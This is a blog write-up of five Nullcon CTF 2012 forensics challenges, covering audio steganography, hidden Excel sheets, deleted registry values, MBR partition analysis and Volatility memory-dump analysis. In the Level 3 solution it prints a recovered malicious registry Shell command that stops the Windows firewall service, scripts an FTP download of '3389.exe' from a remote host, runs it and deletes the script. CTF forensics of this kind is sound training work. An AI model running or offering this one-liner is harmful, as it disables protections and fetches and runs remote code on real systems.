Mittwoch, 18. Januar 2012

Nullcon CTF 2012 Forensic Writeup

Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno

While conducting the raid on a suspect the police found the system containing no suspicious information in the form of a code. While comparing various files they came up with a suspicious sound file and feel that the code is hidden inside the same.
You are asked to find out that code if hidden in the file.

File: JS.rar

song name

If you listen to you will notice, there are some silent voices. I opened it in Audacity and looked for silentparts, removed everything else and played it again. It was sounding like a reversed voice. So i reversed the whole audio using Audacity and listened to some numbers, which is the flag

Flag: 12344346765

Forensics Level 2: Andar Ch0r

A company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codes secretly outside the organisation. The company sniffed the data being sent and reconstructed it to find that a word document was being sent.
The company strongly suspects that there is some hidden passport code in the document.
You as a forensic investigator are provided with the copy of that file and are required to find out the hidden code. The code has to be in whole number.

A word file was given with an image containing this string:

Which is ascii encoded for "Do you really feel that the architect is so dumb?"

If you run strings on it you will see some information
Here is your Passport number to the new level
Hey Good Job doneK
I wonder if you need to fire up your brain even more to reach the new level
May be yes
May be no

Seems like there is something else inside
running foremost on it
0:      00000000.ole          41 KB               0
1: 18 KB 10130

$ unzip
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: theme/theme/themeManager.xml
inflating: theme/theme/theme1.xml
inflating: theme/theme/_rels/themeManager.xml.rels

nothing intereseting inside

opening the ole in XLS:
"Well done………… I guess you are on the correct path…….. Carry on"

After clicking on Format->Sheet->Unhide you can unhide the Nullcon2 sheet.
Hey Good Job done
I wonder if you need to fire up your brain even more to reach the new level
May be yes
May be no
I guess ………………………. What do I Say ;)

But this is not enough, what i have now done is. Saving the file in the xlsx format. Unziping it and looking into xml files.
opening xl/workbook.xml changing
sheet name="Nullcon3" sheetid="3" state="veryHidden" id="rId3"
sheet name="Nullcon3" sheetid="3" state="hidden" id="rId3"

saving it and compressing to a new xlsx file.

$ zip -r myzip.xlsx *
adding: [Content_Types].xml (deflated 77%)
adding: _rels/ (stored 0%)
adding: _rels/.rels (deflated 60%)
adding: docProps/ (stored 0%)
adding: docProps/app.xml (deflated 53%)
adding: docProps/core.xml (deflated 49%)
adding: xl/ (stored 0%)
adding: xl/_rels/ (stored 0%)
adding: xl/_rels/workbook.xml.rels (deflated 76%)
adding: xl/calcChain.xml (deflated 16%)
adding: xl/sharedStrings.xml (deflated 43%)
adding: xl/styles.xml (deflated 55%)
adding: xl/theme/ (stored 0%)
adding: xl/theme/theme1.xml (deflated 80%)
adding: xl/workbook.xml (deflated 45%)
adding: xl/worksheets/ (stored 0%)
adding: xl/worksheets/sheet1.xml (deflated 46%)
adding: xl/worksheets/sheet2.xml (deflated 53%)
adding: xl/worksheets/sheet3.xml (deflated 61%)

Open it and unhide nullcon3 and you see the calculated value:

Keep attention, that you have to use "." seperator, it won't accept it with a ",".

Actually there was a faster way. Open the document in Excel, pres ALT+F11 and you get the VBA Project Listing. Select Sheet3 and press F6 and you get the Properties and chang the visibility to visible :) Thx to king_aurther for pointing to this.

Forensics Level 3: Not Guilty!

An employee was suspected of using some malicious files. The employee asserts that he is not guilty cause he never used any program except microsoft word and excel.
While conducting the analysis nothing was found in the registry suggesting that something did run automatically. All locations that can run program automatically were examined and nothing malicious was found.
You as an investigator are provided with a piece of hive to carve out if anything was deleted from the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets the justice.

There are many tool at The Forensic Wiki.
$ reglookup-timeline software > timeline.txt
$ cat timeline.txt | awk '{print $1}' | sort | uniq

$ reglookup-recover software
ERROR: Bad cell length encountered while parsing unallocated cells at offset 0x00A27908.
00B4EEA0,00000020,VALUE,,Shell,,,SZ,c:\x5Cwindows\x5Csystem32\x5Ccmd.exe /c net1 stop sharedaccess&echo open> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q,490,,,,,

Value: Shell
Type: REG_SZ
Data: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q

Forensics Level 4: Intriguing MBR

A suspected drive was found in bad shape. The data extraction was almost impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial sectors and wherever the system could not read the space was filled with 0x00 so as to keep the offset of the data obtained intact.
The initial sector displayed a messy MBR data.
As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters

The Drive showed to be a SATA drive with 512 bytes of LBA


But the numbers are wrong, i dived the value to 512 to get the LBA, but actually the values inside were already the LBA values, so changed it to

I got a hint telling me the order matters, so the final solution was this post request.

Forensics Level 5: Universal Swindlers Bayonet

Anusandhaanic Daakus Ltd. Is a company whose strength lies in the researches it conducts. Very often the employees leaving the organisation manage to carry the research data alongwith. This time company decided to go for the investigation and called upon a forensic investigator. This investigator captured the memory dump and shut the system down. On resuming the system he finds that the drive has been encrypted and is left with only the memory dump.
You as an investigator are required to find out the following information from the dump 1) Serial No. of external drive
2) Date and time (IST) when the drive was first connected
3)Date and time (IST) when the drive was last connected
4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exe


After playing Codegate, i already knew, that the storage information is stored in the registry, so we have to look for the registry entries.

Check mounted devices first
Look for SYSTEM/MountedDevices
$ -f null.img printkey -K "MountedDevices"

REG_BINARY \??\Volume{f57881e4-37ca-11e1-8cf1-806d6172696f} : (S) CDROM
REG_BINARY \??\Volume{f57881e6-37ca-11e1-8cf1-806d6172696f} : (S)
REG_BINARY \DosDevices\D: : (S)
REG_BINARY \DosDevices\E: : (S) CDROM
REG_BINARY \??\Volume{f57881e8-37ca-11e1-8cf1-806d6172696f} : (S)
REG_BINARY \DosDevices\C: : (S)
REG_BINARY \??\Volume{9f9f94da-37a0-11e1-a8b1-001bb988bbdb} : (S)
REG_BINARY \DosDevices\F: : (S)

0xe101bad8 is the address for system from the hivelist
$ -f null.img hivedump -o 0xe101bad8 | grep -i usbstor
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142
2012-01-06 12:22:13 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0
2012-01-05 13:24:39 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0\Device Parameters
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0\LogConf

$ -f null.img printkey -K "ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142"

Last updated: 2012-01-05 13:24:36
Converted to IST: 2012-01-05 18:54:36

$ -f null.img printkey -K "ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0"

Last updated: 2012-01-06 12:22:13
Converted to IST: 2012-01-06 17:52:13

(S) Device Parameters
(S) LogConf

REG_SZ DeviceDesc : (S) Disk drive
REG_DWORD Capabilities : (S) 16
REG_DWORD UINumber : (S) 0
REG_MULTI_SZ HardwareID : (S) ['USBSTOR\\DiskSeagate_FreeAgent_Go____0142', 'USBSTOR\\DiskSeagate_FreeAgent_Go____', 'USBSTOR\\DiskSeagate_', 'USBSTOR\\Seagate_FreeAgent_Go____0', 'Seagate_FreeAgent_Go____0', 'USBSTOR\\GenDisk', 'GenDisk', '', '']
REG_MULTI_SZ CompatibleIDs : (S) ['USBSTOR\\Disk', 'USBSTOR\\RAW', '', '']
REG_SZ ClassGUID : (S) {4D36E967-E325-11CE-BFC1-08002BE10318}
REG_SZ Service : (S) disk
REG_DWORD ConfigFlags : (S) 0
REG_SZ Driver : (S) {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
REG_SZ Class : (S) DiskDrive
REG_SZ Mfg : (S) (Standard disk drives)
REG_SZ FriendlyName : (S) Seagate FreeAgent Go USB Device

Now the process part
$ -f null.img pstree
Volatile Systems Volatility Framework 2.0
Name Pid PPid Thds Hnds Time
0x821C6A00:System 4 0 59 240 1970-01-01 00:00:00
. 0x81F5FB10:smss.exe 580 4 3 21 2012-01-06 12:39:37
.. 0x81FF92A0:csrss.exe 644 580 11 349 2012-01-06 12:39:38
.. 0x81FF8DA0:winlogon.exe 668 580 20 503 2012-01-06 12:39:38
... 0x81FE35D0:services.exe 712 668 15 258 2012-01-06 12:39:38
.... 0x81F84210:svchost.exe 1056 712 72 1193 2012-01-06 12:39:39
.... 0x81FE8620:svchost.exe 1212 712 14 204 2012-01-06 12:39:39
.... 0x81B73020:alg.exe 516 712 7 103 2012-01-06 12:39:49
.... 0x82018438:svchost.exe 968 712 10 227 2012-01-06 12:39:39
.... 0x82002530:svchost.exe 1176 712 5 58 2012-01-06 12:39:39
.... 0x81FA8AC0:svchost.exe 900 712 20 201 2012-01-06 12:39:38
.... 0x81F586F0:spoolsv.exe 1336 712 13 122 2012-01-06 12:39:39
... 0x81FEEBB8:lsass.exe 724 668 26 343 2012-01-06 12:39:38
0x81F7A428:explorer.exe 1584 1568 13 374 2012-01-06 12:39:40
. 0x81B941E0:nullcon.exe 484 1584 1 22 2012-01-06 12:40:07
.. 0x81BA3020:cmd.exe 320 484 1 28 2012-01-06 12:40:20
. 0x81B403A8:cmd.exe 1048 1584 1 31 2012-01-06 12:40:13
.. 0x81B7B020:win32dd.exe 856 1048 1 21 2012-01-06 12:40:30

We see explorer.exe started nullcon.exe

Seems like that explorer.exe is not the required file.

We see nullcon is started with the parameter C:\WINDOWS\system32\mshearts.exe

and it is calling
C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\user\LOCALS~1\Temp\ztmp\tmp71989.bat C:\WINDOWS\system32\mshearts.exe

Format Expected: "DD/MM/YYYY HH:MM:SS" from the source

SerialNo.: 2GEL32TN
First mounted: 05/01/2012 18:54:36
Last mounted: 06/01/2012 17:52:13
Launched by: mshearts.exe

For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Keine Kommentare:

Kommentar veröffentlichen